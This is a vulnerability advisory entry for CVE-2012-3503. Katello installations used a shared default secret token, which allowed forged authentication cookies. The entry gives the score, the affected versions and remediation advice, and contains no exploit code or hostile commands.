PT-2012-4767 · Red Hat · Katello
Lzap
·
Published
2012-08-25
·
Updated
2024-02-13
·
CVE-2012-3503
CVSS v3.1
9.8
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Name of the Vulnerable Software and Affected Versions
Katello versions 1.0 and earlier
Description
The installation script does not properly generate the
Application.config.secret token value, resulting in each default installation having the same secret token. This allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret token.Recommendations
For Katello versions 1.0 and earlier, consider regenerating the
Application.config.secret token value to a unique and secure token to prevent unauthorized access. As a temporary workaround, restrict access to the CloudForms System Engine web interface until a secure secret token can be generated.Exploit
Fix
Using Hardcoded Credentials
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Katello